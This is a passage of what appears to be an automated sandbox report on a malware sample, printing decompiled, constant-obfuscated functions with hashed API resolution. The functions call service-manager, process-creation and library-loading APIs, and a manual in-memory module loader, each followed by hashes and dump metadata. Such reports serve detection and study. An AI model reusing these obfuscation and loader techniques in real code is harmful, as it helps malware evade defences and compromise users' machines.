				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002493A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0024976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00244F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00244F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}

0x0023568f
0x0023569b
0x0023569e
0x002356a0
0x002356a2
0x002356a5
0x002356a8
0x002356ab
0x002356ac
0x002356af
0x002356b2
0x002356b3
0x002356b4
0x002356b9
0x002356c2
0x002356cc
0x002356cf
0x002356d2
0x002356d9
0x002356e0
0x002356e4
0x002356ef
0x002356f2
0x002356f9
0x00235700
0x0023570e
0x00235711
0x00235718
0x00235722
0x00235727
0x0023572c
0x00235733
0x0023573a
0x00235745
0x00235746
0x00235749
0x0023574d
0x00235754
0x0023575b
0x0023575f
0x00235763
0x0023576a
0x00235771
0x0023577c
0x0023577f
0x00235786
0x0023578d
0x00235799
0x0023579c
0x002357a3
0x002357aa
0x002357b1
0x002357b4
0x002357bb
0x002357c2
0x002357ca
0x002357cd
0x002357d4
0x002357db
0x002357df
0x002357e6
0x002357ea
0x002357f1
0x002357f8
0x00235801
0x00235808
0x0023580f
0x00235816
0x00235822
0x00235827
0x0023582c
0x00235833
0x0023583a
0x00235841
0x00235848
0x0023584f
0x00235856
0x0023585d
0x00235867
0x0023586a
0x0023586d
0x00235874
0x0023587b
0x00235882
0x00235889
0x00235890
0x0023589b
0x002358a1
0x002358a8
0x002358af
0x002358b2
0x002358b9
0x002358c0
0x002358d3
0x002358d6
0x002358de
0x00235915
0x0023591f
0x00235951
0x00235921
0x00235923
0x0023593a
0x00235948
0x00235925
0x00235928
0x00235929
0x0023592a
0x0023592b
0x0023592b
0x0023592e
0x0023592e
0x00235959

Strings

@p , xrefs: 0023579C

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID: @p
API String ID: 963392458-2609516012
Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction ID: 9b68dfc197bd47c961eea7753a341801ad8ae656a43dfa8ae10a79af61eee005
Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction Fuzzy Hash: DB912572510248EFDF58CF61C94A9CE3BA1FF44348F508119FE1A961A0D3B6D959CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0023C0C6, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0023C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00247BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0024889D(0x24c050, _v36, _v52));
				E00242025(_v16, _t154, _v44, _v56);
				_t159 = E0024AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}

0x0023c0d0
0x0023c0d3
0x0023c0d6
0x0023c0d9
0x0023c0da
0x0023c0db
0x0023c0e0
0x0023c0e6
0x0023c0ea
0x0023c0f1
0x0023c0f8
0x0023c0ff
0x0023c106
0x0023c10a
0x0023c111
0x0023c11e
0x0023c121
0x0023c124
0x0023c12b
0x0023c132
0x0023c139
0x0023c140
0x0023c147
0x0023c14e
0x0023c155
0x0023c160
0x0023c163
0x0023c16a
0x0023c171
0x0023c17f
0x0023c186
0x0023c189
0x0023c193
0x0023c196
0x0023c19d
0x0023c1a4
0x0023c1ab
0x0023c1b5
0x0023c1b8
0x0023c1bb
0x0023c1c2
0x0023c1c9
0x0023c1cd
0x0023c1d4
0x0023c1db
0x0023c1e2
0x0023c1e9
0x0023c1f0
0x0023c1f4
0x0023c1fb
0x0023c202
0x0023c209
0x0023c210
0x0023c217
0x0023c21e
0x0023c225
0x0023c229
0x0023c230
0x0023c237
0x0023c23e
0x0023c245
0x0023c24c
0x0023c253
0x0023c257
0x0023c25e
0x0023c265
0x0023c26e
0x0023c277
0x0023c27f
0x0023c282
0x0023c289
0x0023c2ad
0x0023c2bd
0x0023c2d5
0x0023c2e1

Strings

~., xrefs: 0023C0EA

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID: ~.
API String ID: 4033686569-2304494891
Opcode ID: e11c01b653e9edafc52584965c13b241a1e557feda32ca763d527588feac30c4
Instruction ID: bebe33c3a86c9694f0a77d57826e1209fb113644fffbee2bfd32c3a5c26e6de3
Opcode Fuzzy Hash: e11c01b653e9edafc52584965c13b241a1e557feda32ca763d527588feac30c4
Instruction Fuzzy Hash: F1511471C1121DEBDF48DFE5D94A8DEBBB1FB04304F208159E511B6260C7B91A54CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00238736, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00238736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E0024981E(_t77, E0023C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}

0x0023873c
0x00238745
0x00238749
0x00238750
0x00238754
0x0023875b
0x00238762
0x00238766
0x0023876d
0x0023877b
0x0023877d
0x0023877e
0x00238788
0x0023878d
0x00238791
0x00238798
0x0023879f
0x002387a6
0x002387ad
0x002387b7
0x002387bc
0x002387c4
0x002387c7
0x002387ca
0x002387ce
0x002387ed
0x002387f9

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction ID: 261cd3e86bd65de77dc65c8895570fcc03ac5bebad06e8b6854dca6c68ab90fd
Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction Fuzzy Hash: 05215371D00209EFEF08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00232959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00232959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0023602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002407A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0023295f
0x00232964
0x00232967
0x0023296a
0x0023296d
0x0023296e
0x0023296f
0x00232977
0x00232985
0x0023298a
0x00232992
0x0023299a
0x002329a2
0x002329a9
0x002329b0
0x002329b7
0x002329bb
0x002329cf
0x002329dc
0x002329e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002329DC

Strings

<^, xrefs: 00232977

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 4bda07148f96ae91c4ea11f07c8683422217309d709d9b2cf065ab4d5bd33d78
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 5E015B72A00108BBEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0023602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002407A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0023c6e1
0x0023c6e6
0x0023c6f0
0x0023c6fc
0x0023c703
0x0023c706
0x0023c70d
0x0023c711
0x0023c715
0x0023c71c
0x0023c723
0x0023c72a
0x0023c731
0x0023c738
0x0023c751
0x0023c762
0x0023c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0023C762

Strings

/O, xrefs: 0023C6E6

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 8d8e337f00c3192cdd29c10cc9b4f922268430cbab26b068a59f539cbbc88e3d
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 9C1133B290122DBBCB25DF95DC4A8EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00231000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00231000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002407A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00231006
0x00231009
0x0023100c
0x00231011
0x00231016
0x0023101d
0x00231026
0x0023102d
0x00231034
0x0023103b
0x00231047
0x0023104f
0x00231057
0x0023105e
0x00231065
0x0023106c
0x00231073
0x00231077
0x0023108b
0x00231096
0x0023109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00231096

Strings

[, xrefs: 0023103B

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: e58eb9bd9a0dd2f4184544d5c7de3129890655c1ea17d86febe5a0eb92b555e5
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: AE015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 00234859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00234859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002407A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0023485e
0x0023487a
0x0023487d
0x00234884
0x0023488b
0x00234892
0x0023489d
0x002348a0
0x002348ad
0x002348b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002348B7

Strings

[, xrefs: 0023488B

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 7b45bb183b61e0dc11828fde01c81c53077722e1bcb1deb7bc3696ed0e51f854
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 7CF017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B51

Uniqueness

Uniqueness Score: -1.00%

Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}

0x10001783
0x10001787
0x1000178c
0x10001797
0x100017a0
0x100017f9
0x10001806
0x10001808
0x10001808
0x10001815
0x1000181d
0x10001824
0x100017a2
0x100017a2
0x100017a7
0x100017ad
0x100017c6
0x100017cd
0x100017af
0x100017af
0x100017b2
0x100017ba
0x00000000
0x00000000
0x100017ba
0x100017ad
0x100017db
0x100017db
0x1000178e
0x10001793
0x10001793

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790

Uniqueness

Uniqueness Score: -1.00%

Function 00244F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00244F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002407A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00244f80
0x00244f81
0x00244f82
0x00244f86
0x00244f87
0x00244f8c
0x00244fa5
0x00244fa8
0x00244faf
0x00244fb6
0x00244fc7
0x00244fca
0x00244fd7
0x00244fe2
0x00244fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00244FE2

Strings

{#lm, xrefs: 00244FC2

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: d9e351559df2f839ea3f993d8248c07b88d719110bbe9f1616a24110082f9faf
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8FF037B082120CFFDB08DFA4D98689EBFBAEB40300F208199E804AB250D3715B509B51

Uniqueness

Uniqueness Score: -1.00%

Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
